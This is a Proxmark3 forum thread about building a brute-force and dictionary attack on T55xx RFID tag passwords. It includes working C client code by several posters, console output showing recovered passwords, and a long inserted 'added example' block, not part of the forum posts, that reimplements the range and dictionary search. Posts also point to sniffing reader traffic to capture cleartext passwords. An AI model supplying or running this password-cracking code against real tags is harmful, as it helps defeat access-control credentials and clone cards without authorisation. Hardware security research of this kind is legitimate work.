Research, development and trades concerning the powerful Proxmark3 device.
Hi everyone, I think it would be nice to have a brute force attack for t55xx.
proxmark3> lf t55xx dump
[0] 0x1D555555 00011101010101010101010101010101
[1] 0x1D555555 00011101010101010101010101010101
[2] 0x1D555555 00011101010101010101010101010101
[3] 0x1D555555 00011101010101010101010101010101
[4] 0x1D555555 00011101010101010101010101010101
[5] 0x1D555555 00011101010101010101010101010101
[6] 0x1D555555 00011101010101010101010101010101
[7] 0x1D555555 00011101010101010101010101010101
proxmark3> lf t55xx dump feedbeef
[0] 0x00107070 00000000000100000111000001110000
[1] 0x1D555555 00011101010101010101010101010101
[2] 0x55555555 01010101010101010101010101010101
[3] 0x59555555 01011001010101010101010101010101
[4] 0x00000000 00000000000000000000000000000000
[5] 0x00000000 00000000000000000000000000000000
[6] 0x00000000 00000000000000000000000000000000
[7] 0xFEEDBEEF 11111110111011011011111011101111
proxmark3> lf t55xx
help This help
config Set/Get T55XX configuration (modulation, inverted, offset, rate)
detect [1] Try detecting the tag modulation from reading the configuration block.
read <block> [password] -- Read T55xx block data (page 0) [optional password]
write <block> <data> [password] -- Write T55xx block data (page 0) [optional password]
trace [1] Show T55xx traceability data (page 1/ blk 0-1)
info [1] Show T55xx configuration data (page 0/ blk 0)
dump [password] Dump T55xx card block 0-7. [optional password]
special Show block changes with 64 different offsets
bruceforce BruceForce Attack to get Password
proxmark3> lf t55xx bruceforce h
Usage: lf t55xx bruceforce <start password> <end password>
<password>, OPTIONAL password 4bytes (8 hex symbols)
Examples:
lf t55xx bruceforce
lf t55xx bruceforce feedbeef
lf t55xx bruceforce aaaaaaaa bbbbbbbb
proxmark3>
proxmark3> lf t55xx bruceforce feedbee0 feedbfff
Start Password feedbee0
End Password feedbfff
pass [feedbee0] ........Modulation : FSK2a
Bit Rate : 4 - RF/50
Inverted : Yes
Offset : 0
Block0 : 0x00107070
Found Password = feedbeef
proxmark3>
Offline
Are you developing a bruteforce for t55xx?
I have seen there is already an entry in this thread http://proxmark.org/forum/viewtopic.php?id=2405
Last edited by meter (2015-11-06 18:56:08)
Offline
It would take a long long time to brute force the pwd.
Offline
if 1 second per try at myself
Sorry, wrong calculation; it will be 136 years.
Last edited by Go_tus (2015-11-06 19:56:50)
Offline
I suppose you are iterating with a +1 increase... how do you verify that the pwd is correct?
Offline
I use trydetectmodulation. I am not quite sure but I have tested 2 tags with 2 different passwords.
Offline
Here is a simple code by a noob programmer
// Posted as an addition to client/cmdlft55xx.c; it relies on the client's usual
// helpers (PrintAndLog, param_getchar, param_gethex, SendCommand, GetFromBigBuf,
// setGraphBuf) and on tryDetectModulation() from the same file.
int usage_t55xx_bruceforce(){
    PrintAndLog("Usage: lf t55xx bruceforce <start password> <end password>");
    PrintAndLog("  password must be 4 bytes (8 hex symbols)");
    PrintAndLog("Examples:");
    PrintAndLog("  lf t55xx bruceforce aaaaaaaa bbbbbbbb");
    PrintAndLog("");
    return 0;
}

// Read block 0 (page 0) in password mode with one candidate password and
// return true when the demodulated result decodes to a usable config block.
bool SubBruceForce(uint32_t password){
    uint8_t block = 0;
    UsbCommand c = {CMD_T55XX_READ_BLOCK, {0, block, 0}};
    // Password mode: arg[2] carries the password, asBytes[0] = 1 enables it
    c.arg[2] = password;
    c.d.asBytes[0] = 0x1;
    clearCommandBuffer();
    SendCommand(&c);
    if ( !WaitForResponseTimeout(CMD_ACK,NULL,2500) ) {
        PrintAndLog("command execution time out");
        return false;   // was "return 2", which a bool caller would take as a hit
    }
    // Fetch the raw samples and let tryDetectModulation() decide whether
    // block 0 decodes to a configuration block
    uint8_t got[12000];
    GetFromBigBuf(got,sizeof(got),0);
    WaitForResponse(CMD_ACK,NULL);
    setGraphBuf(got,12000);
    DemodBufferLen=0;
    return tryDetectModulation();
}

int CmdT55xxBruceForce(const char *Cmd){
    uint32_t start_password = 0x00000000; //start password
    uint32_t end_password   = 0xFFFFFFFF; //end password
    uint8_t t[4];
    bool found = false;

    char cmdp = param_getchar(Cmd, 0);
    if (cmdp == 'h' || cmdp == 'H' || cmdp == 0x00)
        return usage_t55xx_bruceforce();

    // Both passwords are mandatory 8-hex-digit values (param_gethex returns 0 on success)
    if (param_gethex(Cmd, 0, t, 8) != 0)
        return usage_t55xx_bruceforce();
    start_password = (uint32_t)t[0] << 24 | (uint32_t)t[1] << 16 | (uint32_t)t[2] << 8 | t[3];
    if (param_gethex(Cmd, 1, t, 8) != 0)
        return usage_t55xx_bruceforce();
    end_password = (uint32_t)t[0] << 24 | (uint32_t)t[1] << 16 | (uint32_t)t[2] << 8 | t[3];
    if (start_password > end_password)
        return usage_t55xx_bruceforce();

    printf("Start Password %08x\n", start_password);
    printf("  End Password %08x\n", end_password);

    // Unsigned counter with an explicit end check: with a signed int,
    // "i <= 0xFFFFFFFF" never becomes false and the loop runs forever
    uint32_t i = start_password;
    printf("\n[%08x] ", i);
    for (;;) {
        found = SubBruceForce(i);
        if (found || i == end_password)
            break;
        i++;
        // Progress: one dot per try, a new line every 256 passwords
        if ((i % 0x100) == 0)
            fprintf(stdout, "\n[%08x] ", i);
        else
            fprintf(stdout, ".");
        fflush(stdout);
    }
    printf("\n");
    if (found)
        printf("Found Password = %08x\n", i);
    else
        printf("NOT Found, Last Password = %08x\n", i);
    return 0;
}

static command_t CommandTable[] =
{
    {"help",       CmdHelp,             1, "This help"},
    {"config",     CmdT55xxSetConfig,   1, "Set/Get T55XX configuration (modulation, inverted, offset, rate)"},
    {"detect",     CmdT55xxDetect,      0, "[1] Try detecting the tag modulation from reading the configuration block."},
    {"read",       CmdT55xxReadBlock,   0, "<block> [password] -- Read T55xx block data (page 0) [optional password]"},
    {"write",      CmdT55xxWriteBlock,  0, "<block> <data> [password] -- Write T55xx block data (page 0) [optional password]"},
    {"trace",      CmdT55xxReadTrace,   0, "[1] Show T55xx traceability data (page 1/ blk 0-1)"},
    {"info",       CmdT55xxInfo,        0, "[1] Show T55xx configuration data (page 0/ blk 0)"},
    {"dump",       CmdT55xxDump,        0, "[password] Dump T55xx card block 0-7. [optional password]"},
    {"special",    special,             0, "Show block changes with 64 different offsets"},
    {"bruceforce", CmdT55xxBruceForce,  0, "BruceForce Attack to get Password"},
    {NULL, NULL, 0, NULL}
};
Last edited by Go_tus (2015-11-24 06:57:37)
Offline
I tried your code and made it a bit simpler.
Using the config block and detectModulation might not be the fastest way to detect a valid password but it works.
pm3 --> lf t55 brute 0 3
Search password range [00000000 -> 00000003]
[00000000],
Password NOT found. Last tried: [00000004]
pm3 --> lf t55 brute 11223340 11223346
Search password range [11223340 -> 11223346]
Chip Type : T55x7
Modulation : ASK
Bit Rate : 5 - RF/64
Inverted : No
Offset : 33
Block0 : 0x00148050
Password found [11223344]
Offline
I added some ideas from Piwi, and the bruteforce can now load a default_pwd.dic file with some easy pwds and the two known cloner pwds.
Offline
and some other fixes, like cancelling the bruteforce via keyboard, showing the wrong end pwd when not found, ...
If the PM3 community has more known passwords for t55xx cloners, now it would be nice to add them.
Offline
Hi Piwi,
I'll try (desperately) to compile your fork of pm3,
but I am stuck on:
cmdhfmf.c:12:25: fatal error: cmdhfmfhard.h: No such file or directory
#include "cmdhfmfhard.h"
I try to build with:
LANG=C make UBUNTU_1404_QT4=1
I was looking into github from iceman and you, but I can't find these two files.
Could you point me in the right direction?
Regards
Offline
It's in piwi's fork, branch hard_nested...
Offline
but I noticed that piwi's files were missing in my fork too. I added them and pushed them to github.
Offline
Thanks a lot iceman,
With your help, I was able to successfully compile the Piwi fork and yours.
Note: must use "make UBUNTU_1404_QT4=1" to build your fork.
Big hello to my Swedish friends
Last edited by rbubba1911 (2015-12-02 19:12:55)
Offline
@rbubba1911, as a sidenote, I changed the makefile, so you no longer require that extra parameter.
--
There were some questions about how this bruteforce works.
It's quite simple, following go_tus's original version, as mentioned and explained in this thread.
I just modified it to work a bit better.
The BF is a simple incremental one, where it starts with a number and goes up until it finds a working pwd.
It's an online BF, where you need the t55xx tag on your PM3. It works against the tag, not a reader.
There are two modes: one is a range scan from start number to end number, the other loads a dictionary (i.e. a known pwds list) which it tries one by one.
The inner workings are the following part, where it tries to read Block 0 with a test pwd, and the verify part is that it tries to decode the block0 (config) into a working config block. That is done inside the "trydetectmodulation" function.
This is also why it is so slow. Trying to decode a config block takes quite a lot of time. This is the only way to figure out if a pwd was correct or not. It's not perfect, since the decoding can find a non-existent but still valid-looking config block; it would then give a false positive answer about the pwd.
Running against the whole search space is not practical, however a dictionary list with pwds would be acceptable.
I've added one such list with some defaults and some found known cloner pwds.
// inside the search loop (surrounding loop omitted here): read block 0 with the candidate, then verify it
if ( !AquireData(T55x7_PAGE0, T55x7_CONFIGURATION_BLOCK, TRUE, testpwd))
    break;  // no answer from the device, stop the search
found = tryDetectModulation();
This command uses A) bruteforce to scan a number range
                  B) a dictionary attack
Usage: lf t55xx bruteforce <start password> <end password> [i <*.dic>]
       password must be 4 bytes (8 hex symbols)
Options:
     h           - this help
     <start_pwd> - 4 byte hex value to start pwd search at
     <end_pwd>   - 4 byte hex value to end pwd search at
     i <*.dic>   - loads a default keys dictionary file <*.dic>
Examples:
       lf t55xx bruteforce aaaaaaaa bbbbbbbb
       lf t55xx bruteforce i default_pwd.dic
Last edited by iceman (2016-02-23 17:30:01)
Offline
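Go_tus's code earlier in the thread and the explanation in this post come down to the same loop: try a password, read block 0, and accept the password when the block decodes to a usable T55x7 configuration. The following is an added example, not Proxmark3 project code and not Go_tus's or iceman's: it implements both search modes (range scan and a *.dic dictionary, with a parser for the dictionary text), the block 0 decoding into the fields that "lf t55xx info" prints, the MAXBLOCK check mentioned later in the thread, and the two pitfalls discussed here (a 32-bit counter that never terminates, and the false positive from a noise word that happens to decode), all against a tag simulated in software. The field masks are the T55x7 block 0 layout as the Proxmark3 client defines it; sim_tag, sim_read_block0, try_one, demo_dic, demo_tag and the 0x00008010 noise word are constructed for this example, and the tag values (password feedbeef, block 0 = 0x00107070, the undecodable 0x1D555555 from the unauthenticated dump) are taken from the first post. The demodulation of raw samples that tryDetectModulation does on the real client is left out; the simulated tag hands back a 32-bit word directly.

```c
/* Added example, not Proxmark3 project code: host-side simulation of the T55xx
 * password search this thread describes. The tag is software; no PM3 involved. */
#include <ctype.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* T55x7 block 0 (page 0) field masks as the Proxmark3 client defines them */
#define T55X7_BITRATE_MASK    0x001C0000u  /* bits 18-20: bit rate RF/n */
#define T55X7_MODULATION_MASK 0x0001F000u  /* bits 12-16: modulation */
#define T55X7_MAXBLOCK_MASK   0x000000E0u  /* bits 5-7: last block in read sequence */
#define T55X7_PWD_BIT         0x00000010u  /* bit 4: password mode enabled */

typedef struct {
    uint8_t bitrate_idx;     /* 0..7, printed as "Bit Rate : 4 - RF/50" */
    uint16_t rf_divisor;
    const char *modulation;  /* NULL when the field is not a known value */
    uint8_t maxblock;        /* worth checking before trying to read block 7 */
    bool pwd_mode;
} t55x7_cfg;

/* Decode block 0; false when the modulation field is unknown, which is how
 * a demodulated noise word usually fails the check. */
bool t55x7_decode_config(uint32_t block0, t55x7_cfg *cfg)
{
    static const uint16_t rf[8] = {8, 16, 32, 40, 50, 64, 100, 128};
    static const char *mods[32] = {
        [0x00] = "DIRECT", [0x01] = "PSK1", [0x02] = "PSK2", [0x03] = "PSK3",
        [0x04] = "FSK1", [0x05] = "FSK2", [0x06] = "FSK1a", [0x07] = "FSK2a",
        [0x08] = "ASK", [0x10] = "BIPHASE", [0x18] = "DIPHASE"};
    cfg->bitrate_idx = (uint8_t)((block0 & T55X7_BITRATE_MASK) >> 18);
    cfg->rf_divisor = rf[cfg->bitrate_idx];
    cfg->maxblock = (uint8_t)((block0 & T55X7_MAXBLOCK_MASK) >> 5);
    cfg->pwd_mode = (block0 & T55X7_PWD_BIT) != 0;
    cfg->modulation = mods[(block0 & T55X7_MODULATION_MASK) >> 12];
    return cfg->modulation != NULL;
}

/* The thread's verify step: accept a password when its block 0 decodes. Requiring
 * the PWD bit tightens it (a tag that demanded a password has it set), yet a noise
 * word can satisfy both: the false positive iceman describes. 0x00008010 is one. */
bool candidate_is_plausible(uint32_t block0)
{
    t55x7_cfg cfg;
    return t55x7_decode_config(block0, &cfg) && cfg.pwd_mode;
}

/* Simulated tag (constructed). A wrong password yields the word the
 * unauthenticated dump in the first post shows, which does not decode. */
typedef struct { uint32_t password; uint32_t block0; } sim_tag;
uint32_t sim_read_block0(const sim_tag *tag, uint32_t pwd)
{
    return pwd == tag->password ? tag->block0 : 0x1D555555u;
}

/* When found is false, password holds the last value tried */
typedef struct { bool found; uint32_t password; uint64_t tried; } search_result;
static bool try_one(const sim_tag *tag, uint32_t pwd, search_result *r)
{
    r->tried++;
    r->password = pwd;
    r->found = candidate_is_plausible(sim_read_block0(tag, pwd));
    return r->found;
}

/* Mode A: inclusive range scan. The 64-bit counter avoids the endless loop that
 * "int i; while (i <= 0xFFFFFFFF)" gives in the first version posted. */
search_result brute_range(const sim_tag *tag, uint32_t start, uint32_t end)
{
    search_result r = {false, 0, 0};
    for (uint64_t p = start; p <= end && !try_one(tag, (uint32_t)p, &r); p++) {}
    return r;
}

/* Mode B: a dictionary of known passwords, tried one by one */
search_result brute_dictionary(const sim_tag *tag, const uint32_t *dict, size_t n)
{
    search_result r = {false, 0, 0};
    for (size_t i = 0; i < n && !try_one(tag, dict[i], &r); i++) {}
    return r;
}

/* Parse *.dic text: one 8-hex-digit password per line, '#' starts a comment,
 * blank lines are skipped. Returns the number of entries stored in out. */
size_t parse_dic(const char *text, uint32_t *out, size_t max)
{
    size_t n = 0;
    for (const char *p = text; *p && n < max;) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        unsigned v;
        if (len >= 8 && isxdigit((unsigned char)*p) && sscanf(p, "%8x", &v) == 1)
            out[n++] = v;
        p = nl ? nl + 1 : p + len;
    }
    return n;
}

/* Constructed sample dictionary (not the project's default_pwd.dic) and a tag
 * carrying the first post's values: password feedbeef, block 0 = 0x00107070 */
static const char demo_dic[] = "# constructed sample\n00000000\n11223344\n\nfeedbeef\n";
static const sim_tag demo_tag = {0xFEEDBEEFu, 0x00107070u};
```

To exercise it, compile with a main that calls brute_range(&demo_tag, 0xFEEDBEE0u, 0xFEEDBFFFu) and brute_dictionary(&demo_tag, dict, parse_dic(demo_dic, dict, 16)); both return found == true with password 0xFEEDBEEF after 16 and 3 tries respectively, while a range ending at 0xFFFFFFFF terminates cleanly with found == false. Decoding 0x00148050 from iceman's output above gives ASK, bit rate 5 - RF/64, maxblock 2 and the PWD bit set, matching what the client printed. The PWD-bit check is the one tightening this example adds over decode-only verification; on a real tag the remaining false positives still need a second look, for instance re-reading block 0 and comparing.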
Sorry if this is silly, but would there not be a way to glitch this chip? Probably faster than brute..
Offline
We are all open to solutions here, preferably not just products of the mind but actual implementations.
How are you suggesting we glitch the chip?
@marshmellow and I have been bouncing the idea of measuring the exact startup time until the first response.
But we never got it past the idea stage. It's hard to measure the exact time to response...
Offline
We are all open to solutions here, preferably not just products of the mind but actual implementations.
How are you suggesting we glitch the chip?
@marshmellow and I have been bouncing the idea of measuring the exact startup time until the first response.
But we never got it past the idea stage. It's hard to measure the exact time to response...
In my testing, using the pm3 and measuring the time, there was no easy attack possible. The chip response delay appears to vary only slightly and no direct correlation could be made to the password input. Although a full statistical analysis with significantly more testing might reveal something different.
Other ideas would likely require a teardown of the chip.
Last edited by marshmellow (2016-02-23 22:12:57)
Offline
moved to
http://www.proxmark.org/forum/viewtopic … 264#p20264
Last edited by ntk (2016-02-24 19:35:58)
Offline
One enhancement would be checking if MAXBLOCKS allows reading Block 7.
Next, yes, searching the whole keyspace takes 2.4 years, but there is no guarantee that the key is found early or late, hence stating the max time. You can get lucky and find it within 1 min. When it comes to statistically analysing the BF time estimate, well, it's guesswork at best.
Marshmellow and I had an idea: if the pwd checking function would do its checking bit by bit OR byte by byte, hence making an oracle to look for, every correct byte would give longer response times. This doesn't seem to be the case.
It looks like it responds within the same time span regardless.
Next is that once we send the right pwd, we don't know that until we analyse the response, and we need to know what that data might be on an unknown tag. Which is why go_tus chose to look at block0 and the trydetectmodulation function.
This will give us a proper set of data which we can verify on unknown tags.
Next, this is a BF attack against a card, not against a reader.
If you want to attack a reader, try sniffing the traffic and read the password, which is sent in clear.
That's how people on the forum found the pwd for cloner tools.
You are mixing up all kinds of stuff in your ideas. Understand what is going on and find possible attack vectors given a specific situation and target.
Offline
moved to
http://www.proxmark.org/forum/viewtopic … 264#p20264
(oh dear, I did not realise you answered here already, iceman. Should I continue here or on the new one? Sorry)
Last edited by ntk (2016-02-24 19:49:26)
Offline
sorry ntk, but the translation is too bad, the words are too many, and the value too little for me to bother even reading it anymore...
Offline
not just "... it's guesswork at best.", iceman
Strategic
Divide to conquer
Structured
Confusing the enemy
Rigid, like an army, thoughtless and fearsome.
That is the way of a Roman wolf pack total attack; have you seen wolves attack for food in nature programs...
Offline
Don't worry Marshmellow, if you could find out that, even without knowing the password, copying the exact card data is possible, then for the next step not many words are needed.
I talk, I circle, I separate and think of a solution; that is why it seems confusing to others.
In the chaos there are senses and lights... if there are none then we call it dead-end & darkness.
Offline
The problem is searching and mining; in an NP problem brute force may be impractical or even greedy, so I agree that maybe random is better in some cases.
Offline